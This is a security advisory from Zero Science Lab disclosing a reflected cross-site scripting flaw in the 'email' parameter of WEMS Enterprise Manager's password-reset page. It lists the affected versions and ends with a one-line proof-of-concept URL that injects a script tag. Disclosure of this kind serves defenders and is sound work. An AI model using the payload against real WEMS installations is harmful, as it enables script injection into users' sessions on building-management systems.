WEMS Enterprise Manager 2.58 (email) Reflected XSS
Vendor: WEMS Limited
Product web page: https://www.wems.co.uk
Affected version: 2.58.8903
2.55.8806
2.55.8782
2.19.7959
Summary: WEMS Enterprise Manager is a centralised management and monitoring
system for many WEMS equipped sites. It retrieves and stores data to enable
energy analysis at an enterprise wide level. It is designed to give global
visibility of the key areas that affect a buildings' environmental and energy
performance using site data collected via WEMS Site Managers or Niagara compatible
hardware.
Desc: Input passed to the GET parameter 'email' is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML code
in a user's browser session in context of an affected site.
Tested on: Linux
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5551
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5551.php
06.07.2019
--
https://192.168.1.244/guest/users/forgotten?email="><script>confirm(251)</script>